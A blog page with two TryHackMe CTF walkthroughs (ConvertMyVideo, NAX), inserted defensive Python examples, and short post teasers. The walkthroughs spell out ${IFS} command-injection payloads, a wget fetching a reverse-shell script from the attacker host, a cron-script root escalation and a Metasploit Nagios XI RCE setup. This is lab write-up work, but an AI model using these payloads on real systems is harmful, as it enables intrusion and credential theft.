TryHackMe — ConvertMyVideo

It's a very good lab and you can test lots of different topics at the same time;

# I scan with nmap

sudo nmap -sV 10.10.124.59

# find the open web port and browse to it;

# in parallel I start dirsearch to find folders

sudo ./dirsearch.py -u http://10.10.124.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e js,php,html -x 403,404

# so we quickly find the answer to the first question: the /admin folder is our secret folder;

# so I understood basic authentication was in use and user credentials were needed; I started a password attack and at the same time started web application testing

In Burp I start request manipulation;

The first thing I investigate is the yt_url parameter; when I write

|ls

I can execute my command, and after that I think the room is very simple to solve;

# but after that I sent lots of Linux commands and got an error every time; so I created more errors and searched the internet for youtube-dl

# I find the source code of youtube-dl

ytdl-org/youtube-dl: download videos from youtube.com or other video platforms (github.com)

# in my tests I kept getting errors about invalid parameters and options; so when I looked at the GitHub page I saw the valid options

# and send the first option, --help, over Burp

yt_url=--help

and bingo, the --help option worked for me; I can see all the help information in the response,

# after that step I try to send more powerful commands that help me reach my aim, and I spent about 1.5 hours on that;

# the main problem: simple commands like ls, id executed, but when I tried to execute ls -al I got syntax errors every time; so I focused on sending commands without spaces;

# Google, my best helper; search:

"How to send a command with arguments without spaces?"

How to send a command with arguments without spaces? (unix.stackexchange.com)

and find the right approach:

cat${IFS}file.txt

So using ${IFS} I can send commands without spaces; but before this I send all my requests to Burp Repeater for more efficient manipulation;

# please be careful with that part, because our parameter must be:

--version;ls${IFS}-al;

note: these options start with two hyphens (- -), which the display renders as a single long dash; you can use all options the same way: --help, --execute, --version

# so I can run any command with that method; now I try to access the /admin folder;

yt_url=--version;ls${IFS}/var/www/html/admin${IFS}-al;

# found .htpasswd and flag.txt

for reading flag.txt:

yt_url=--version;cat${IFS}/var/www/html/admin/flag.txt;

and with the same method, when you look at .htpasswd;

yt_url=--version;cat${IFS}/var/www/html/admin/.htpasswd;

you can find the user;
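The root cause behind the `${IFS}` and `--version;` tricks above is that the yt_url value is handed to a shell as part of a command string. The Python below is an added example, not the lab's own code: it puts the unsafe concatenation next to a hardened handler (allowlist validation, argv invocation with `--`, no shell) and adds a small scan over request lines for the same payload shape. The parameter name yt_url is taken from the write-up; the request lines are constructed, and `run_download` assumes youtube-dl is on PATH.

```python
"""Unsafe shell concatenation vs. a hardened handler for a yt_url-style parameter.

Added example (not the ConvertMyVideo lab's own code). The parameter name
yt_url comes from the write-up; the sample request lines are constructed.
"""
import re
import subprocess
from urllib.parse import unquote, urlparse

# Characters a media URL never needs but /bin/sh treats specially.
SHELL_META = re.compile(r'[;&|`$<>(){}\\\'"\s]')


def vulnerable_command(value: str) -> str:
    """The pattern behind the lab: the raw parameter is pasted into a shell command line.
    Anything after ';' becomes a second command, and ${IFS} is expanded by the shell."""
    return "youtube-dl " + value


def validate_media_url(value: str) -> str:
    """Return value if it is an absolute http(s) URL with no shell metacharacters
    and does not start with '-' (which would otherwise be parsed as an option)."""
    if value.startswith("-"):
        raise ValueError("value looks like a command-line option")
    if SHELL_META.search(value):
        raise ValueError("shell metacharacter in URL")
    parsed = urlparse(value)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        raise ValueError("only absolute http(s) URLs are accepted")
    return value


def safe_argv(value: str) -> list:
    """Build an argv list for the downloader. '--' ends option parsing, and because the
    list is passed to subprocess without shell=True, ';' and ${IFS} are never interpreted."""
    return ["youtube-dl", "--", validate_media_url(value)]


def run_download(value: str) -> subprocess.CompletedProcess:
    """Invoke youtube-dl without a shell. Assumes youtube-dl is on PATH; not called in the demo."""
    return subprocess.run(safe_argv(value), shell=False, capture_output=True, text=True, timeout=300)


# --- Detection side: spot the injection shape in logged parameter values ---
INJECTION_MARKERS = re.compile(r'\$\{IFS\}|;|\||`|\$\(')


def flag_param(raw_value: str) -> bool:
    """True if a URL-encoded parameter value decodes to something containing
    ';', '|', a backtick, '$(' or '${IFS}'."""
    return bool(INJECTION_MARKERS.search(unquote(raw_value)))


# Constructed request lines in the shape "METHOD path param=value" (not real logs).
SAMPLE_REQUESTS = [
    "POST /admin/index.php yt_url=https%3A%2F%2Fexample.invalid%2Fwatch%3Fv%3Dabc",
    "POST /admin/index.php yt_url=--version%3Bls%24%7BIFS%7D-al%3B",
    "POST /admin/index.php yt_url=https%3A%2F%2Fexample.invalid%2F%7Cid",
]


def scan_requests(lines) -> list:
    """Return the request lines whose yt_url value trips flag_param()."""
    hits = []
    for line in lines:
        _, _, query = line.partition("yt_url=")
        if query and flag_param(query):
            hits.append(line)
    return hits


if __name__ == "__main__":
    print(vulnerable_command("--version;ls${IFS}-al;"))
    print(safe_argv("https://example.invalid/watch?v=abc"))
    for hit in scan_requests(SAMPLE_REQUESTS):
        print("suspicious:", hit)
```

The two fixes reinforce each other: the allowlist rejects a leading `-` so the value can never be read as an option, and the argv call means there is no shell left to expand `${IFS}` even if a metacharacter slipped through validation.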

Now I need a reverse shell; for that reason I prepare a bash-based reverse shell, shell.sh, on my Kali machine,

and on my Kali I start

python -m SimpleHTTPServer 8090

and over Burp I try to download that file onto the vulnerable machine

yt_url=--version;wget${IFS}http://10.9.32.166:8090/shell.sh;

--version;chmod${IFS}755${IFS}/var/www/html/shell.sh;

so I downloaded it and gave it execute permission; after that I start nc on my Kali to listen;

when I start shell.sh over Burp I have a shell 🙂

--version;bash${IFS}shell.sh;

# when I had a console I looked at all the methods, spent 2 hours, and at last found only one way forward: there is a clean.sh script under the tmp folder; some cronjob executes it periodically and it is writable by me (how do I know? only CTF experience)

so I try to execute this command;

echo ' cat /root/root.txt >root-oldum' >>clean.sh

and bingo, I have a root-oldum file in the same directory that includes the root.txt flag.
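The step to root above works because cron runs a script that a low-privileged user can write to. The Python below is an added example, not part of the write-up: it parses /etc/crontab-style lines, finds the script each entry runs, and reports scripts (or parent directories) that someone other than the entry's user could modify. `demo()` builds a constructed scenario in a temporary directory with a deliberately world-writable `clean.sh` next to a locked-down script; it never reads the real crontab, and the cron user name `cronuser` is a placeholder resolved to the current uid.

```python
"""Audit cron-invoked scripts for write access by users other than the entry's owner.

Added example (not the write-up's own code). demo() creates constructed files in a
temporary directory; it does not read the real /etc/crontab.
"""
import os
import pwd
import re
import stat
import tempfile

# Six-field system crontab line: minute hour dom month dow user command...
SYSTEM_CRON_LINE = re.compile(r'^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$')
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl"}


def cron_targets(crontab_text: str) -> list:
    """Return [(user, script_path)] for each command entry in /etc/crontab-style text."""
    targets = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        # skip blanks, comments and VAR=value lines such as SHELL=/bin/bash
        if not stripped or stripped.startswith("#") or re.match(r'^\w+=', stripped):
            continue
        m = SYSTEM_CRON_LINE.match(line)
        if not m:
            continue
        argv = m.group("cmd").split()
        # "bash /tmp/clean.sh": the script is the interesting file, not the interpreter
        script = argv[1] if os.path.basename(argv[0]) in INTERPRETERS and len(argv) > 1 else argv[0]
        targets.append((m.group("user"), script))
    return targets


def audit_script(path: str, owner_uid: int) -> list:
    """Return a list of issue strings for one script path (empty list means no finding)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing: a writable parent directory would let anyone create it"]
    issues = []
    if st.st_mode & stat.S_IWOTH:
        issues.append("world-writable")
    if st.st_mode & stat.S_IWGRP:
        issues.append("group-writable")
    if st.st_uid != owner_uid:
        issues.append(f"owned by uid {st.st_uid}, not the cron user (uid {owner_uid})")
    parent = os.stat(os.path.dirname(path) or ".")
    # world-writable directory without the sticky bit: the script can be replaced by rename
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        issues.append("parent directory world-writable without sticky bit")
    return issues


def audit_crontab(crontab_text: str, resolve_uid=None) -> dict:
    """Map each cron-invoked script path to its list of issues.
    resolve_uid(name) -> uid defaults to the passwd database; it must raise KeyError for unknown users."""
    if resolve_uid is None:
        resolve_uid = lambda name: pwd.getpwnam(name).pw_uid
    report = {}
    for user, script in cron_targets(crontab_text):
        try:
            uid = resolve_uid(user)
        except KeyError:
            report[script] = [f"cron user {user!r} does not exist"]
            continue
        report[script] = audit_script(script, uid)
    return report


def demo() -> dict:
    """Constructed scenario: one world-writable script and one locked-down script. The
    placeholder user 'cronuser' is mapped to the current uid so the ownership check is deterministic."""
    workdir = tempfile.mkdtemp()
    loose = os.path.join(workdir, "clean.sh")
    tight = os.path.join(workdir, "backup.sh")
    for path in (loose, tight):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho cleanup\n")
    os.chmod(loose, 0o777)   # the misconfiguration: anyone can append to it
    os.chmod(tight, 0o755)
    crontab = (
        "SHELL=/bin/bash\n"
        "# m h dom mon dow user command\n"
        f"*/1 * * * * cronuser bash {loose}\n"
        f"0 2 * * * cronuser {tight}\n"
    )
    return audit_crontab(crontab, resolve_uid={"cronuser": os.getuid()}.__getitem__)


if __name__ == "__main__":
    for script, issues in demo().items():
        print(script, "->", issues or "ok")
```

Run against a real host, `audit_crontab(open("/etc/crontab").read())` covers the system table only; per-user crontabs and the /etc/cron.d, cron.hourly and similar directories need the same check applied to each file they reference.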

Super CTF, thank you overjt

TryHackMe — NAX walkthrough

ROOM NAX https://tryhackme.com/room/nax

1. First, read the description of the room carefully;

Nax

Identify the critical security flaw in the most powerful and trusted network monitoring software on the market, that allows a user authenticated execute remote code execution.

2. I started searching for the best network monitoring tools;

https://www.pcwdld.com/best-network-monitoring-tools-and-software

3. This name is very similar to our room: Nagios XI (NAX)

4. Start port scanning

sudo nmap -sV 10.10.87.52

5. Browse to http://10.10.87.52

6. "Welcome to Elements" looks like a periodic table, so I start searching for the numbers;

https://www.ptable.com/

7. I create a table converting each element symbol to its atomic number;

8. After that, I convert the ASCII codes to text

http://www.unit-conversion.info/texttools/ascii/

9. We find the first answer;

10. Try to access http://10.10.87.52/PI3T.PNg

11. Extract the EXIF info:

12. We find 2 answers:

13. After that I try to find known URLs and maybe directories, so I try dirsearch;

./dirsearch.py -u http://10.10.87.52/ -e php,html

14. Find the default login page;

http://10.10.87.52/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1

15. I did a small Google search about the Nagios XI default username and password, and found default username: nagiosadmin, password: PASSW0RD (with a zero)

16. I try answer #3 with the default username; it is OK.

17. But the default username and password are not valid for login. After that the hardest stage started for me. What is the password, and how can I find it? I spent 2.5 hours finding the answer.

18. I did Google searching, focusing on the picture I found and on steganography; I tried all the tools listed on that site;

https://0xrick.github.io/lists/stego/

19. And found an interesting result which I had never heard of before

20. The name of this method looks like our Piet Mondrian name, so I focused the Google search on npiet online and found that site;

https://www.bertnase.de/npiet/npiet-execute.php

21. In the lower part of the picture I found a password which starts with %,

22. I was sure the system was Nagios XI and started searchsploit;

23. So we find answer #5

24. Now start to configure metasploit:

msf5 > use exploit/linux/http/nagios_xi_authenticated_rce

msf5 > options

msf5 > set PASSWORD XXXXXXXXXXXXXXXX

msf5 > set RHOSTS 10.10.87.52

msf5 > set LHOST 10.9.32.166

25. We found answer #7;

26. Then run the exploit;

Uraaaaa!!
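Steps 6 to 9 of the walkthrough (element symbol to atomic number, atomic number read as an ASCII code) were done by hand with a periodic table and an online converter. The Python below is an added example, not the write-up's own tooling, that automates the same mapping in both directions; the sample message "Hf Md Hs Hs Rg Ge Ho Po Yb" is constructed, not the room's data. It also handles the two edge cases a solver runs into: symbols written without separators, and characters above ASCII 118 (there is no element beyond Og, so `w` to `z` cannot be encoded this way).

```python
"""Element symbols -> atomic numbers -> ASCII text.

Added example, not the write-up's own tooling: it automates steps 6-9 of the NAX
walkthrough. The sample message "Hf Md Hs Hs Rg Ge Ho Po Yb" is constructed.
"""
import re

# Symbols in atomic-number order, so position + 1 is the atomic number.
ELEMENTS = (
    "H He Li Be B C N O F Ne Na Mg Al Si P S Cl Ar K Ca Sc Ti V Cr Mn Fe Co Ni Cu Zn "
    "Ga Ge As Se Br Kr Rb Sr Y Zr Nb Mo Tc Ru Rh Pd Ag Cd In Sn Sb Te I Xe Cs Ba "
    "La Ce Pr Nd Pm Sm Eu Gd Tb Dy Ho Er Tm Yb Lu Hf Ta W Re Os Ir Pt Au Hg Tl Pb Bi Po At Rn "
    "Fr Ra Ac Th Pa U Np Pu Am Cm Bk Cf Es Fm Md No Lr Rf Db Sg Bh Hs Mt Ds Rg Cn Nh Fl Mc Lv Ts Og"
).split()
ATOMIC_NUMBER = {sym: n for n, sym in enumerate(ELEMENTS, start=1)}   # "H" -> 1 ... "Og" -> 118
SYMBOL_OF = {n: sym for sym, n in ATOMIC_NUMBER.items()}


def tokenize(message: str) -> list:
    """Split 'Hf Md Hs' or the run-together form 'HfMdHs' into element symbols."""
    parts = message.split()
    if len(parts) > 1:
        return parts
    compact = message.strip()
    # a symbol is one capital optionally followed by one lowercase letter
    tokens = re.findall(r"[A-Z][a-z]?", compact)
    if "".join(tokens) != compact:
        raise ValueError(f"not a clean run of element symbols: {message!r}")
    return tokens


def decode_elements(message) -> str:
    """Map each symbol to its atomic number and treat that number as an ASCII code."""
    symbols = tokenize(message) if isinstance(message, str) else list(message)
    chars = []
    for sym in symbols:
        if sym not in ATOMIC_NUMBER:
            raise ValueError(f"unknown element symbol {sym!r}")
        chars.append(chr(ATOMIC_NUMBER[sym]))
    return "".join(chars)


def encode_text(text: str) -> list:
    """Inverse mapping. Only ASCII 1..118 is representable, so 'w'..'z' (119..122) cannot be encoded."""
    out = []
    for ch in text:
        code = ord(ch)
        if code not in SYMBOL_OF:
            raise ValueError(f"{ch!r} (ASCII {code}) has no element with that atomic number")
        out.append(SYMBOL_OF[code])
    return out


if __name__ == "__main__":
    sample = "Hf Md Hs Hs Rg Ge Ho Po Yb"   # constructed sample, not the room's data
    print(decode_elements(sample))
    print(" ".join(encode_text("Hello CTF")))
```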

A Security Audit Approach for Silverlight Applications

Microsoft Silverlight is a rich internet application development platform that provides animation, vector and 3D graphics and video playback capabilities for web applications. Many organisations choose it for their internal applications. In my opinion the reason for this preference is that developers can easily build fully showy drag-and-drop interfaces with lively graphics, especially for presenting to senior management. Continue reading "A Security Audit Approach for Silverlight Applications"

Check Active Directory Latency With PowerShell

When managing a large-scale Active Directory environment, the more important part is checking and understanding replication quality. In this situation I used the repadmin command to check replication health. But this command is not enough to understand exactly when replication finished. So I started searching the internet and found a script to check Active Directory latency with PowerShell (http://bsonposh.com/archives/276); when I started this script I understood that it does not handle a large-scale DC environment, and it enters a loop if replication does not finish. Continue reading "Check Active Directory Latency With PowerShell"

Server+Client Inventory Notification Script

For colleagues who manage systems, especially at enterprise scale and in distributed structures, the script below automatically determines the daily client count, the server count and the grouped counts of operating systems used in the domain, and sends an HTML-based report to the system administrators at a set time. Continue reading "Server+Client Inventory Notification Script"

Introduction to Entrepreneurship

I am aware that the title is very ambitious; my aim is not to teach you entrepreneurship but to share what I have experienced and will experience, my mistakes and my right moves, as I step onto this path.

So while sharing things with you I will also learn a lot. You will be able to closely follow experiences lived in a country (Russia) far from my own language and my own network. Most importantly, I will have recorded my own process of change.

Thank you in advance to everyone who supports me in this process.

Free Access to Paid Udemy Content

Udemy, whose developers are Turkish, is a video-training-based personal development platform built by people who are experts in their subjects and fields, or who think they are. On the site you can reach many great paid and free contents. In general it is a site I use a lot myself.

After this brief information about the site, let's get to the main topic of our article.

I will share with you a procedural and architectural flaw on the Udemy site that lets you reach training series sold as paid content without paying any fee. General information about this flaw was reported by me to the Udemy security group. You can see this process in the later parts of the article.

Let's get to putting the vulnerability into practice;

Continue reading "Free Access to Paid Udemy Content"

MVP Enterprise Security

After a tough year I was nominated for the MVP title in the Enterprise Security area by Microsoft Turkmenistan. On 3 January 2015, like a new-year gift, I received an e-mail informing me that my MVP status had been approved. I will try to carry this respected title worthily. I thank everyone who supported this award, especially my Turkmenistan IT team.

So what is MVP? According to Microsoft;

The Microsoft Most Valuable Professional (MVP) Award is our way of saying thank you to exceptional, independent community leaders who share their passion, technical expertise, and real-world knowledge of Microsoft products with others. It is part of Microsoft’s commitment to supporting and enriching technical communities. Even before the rises of the Internet and social media, people have come together to willingly offer their ideas and best practices in technical communities.

Remote Active Directory / Exchange Administration with Windows PowerShell

Windows Server automatically installs the Active Directory Module for Windows PowerShell and Active Directory Administrative Center when you add the Active Directory Domain Services (AD DS) or Active Directory Lightweight Directory Services (AD LDS) role.

But if, like me, you want to manage Active Directory from another computer at a remote location, you can do so with the Active Directory Module and ADAC, as long as you are running Windows 7 on the remote computer. Continue reading "Remote Active Directory / Exchange Administration with Windows PowerShell"